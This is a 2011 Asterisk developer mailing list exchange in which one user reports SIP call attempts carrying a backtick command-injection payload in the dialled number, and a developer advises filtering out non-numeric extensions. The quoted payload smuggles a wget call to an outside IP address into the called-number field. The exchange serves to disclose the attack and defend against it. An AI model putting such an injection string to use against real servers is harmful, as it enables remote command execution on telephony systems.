[asterisk-dev] A new kind of SIP attack ?

Olle E. Johansson oej at edvina.net
Mon Sep 12 03:47:48 CDT 2011


12 sep 2011 kl. 10:39 skrev Pavel Troller:

> Hi!
>  Since yesterday, I can see strange "call attempts" coming to my
> switches over SIP to destinations like this:
>  00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
>  I tried to wget the file manually and it was successful, but it was
> empty (zero size).
>  I'm just informing about something which may be a new kind of hacking
> attempt. I hope that Asterisk doesn't perform backtick expansion during
> processing of the called number, but I'm writing it there to be sure
> that a developer's eye will look at this and confirm it.
>  With regards,
>    Pavel Troller
> 

Just wanted to add that the best current practise we added to the README files earlier apply here as well. If your diaplan ONLY has numeric extensions, filter out all the rest on incoming calls.

/O


More information about the asterisk-dev mailing list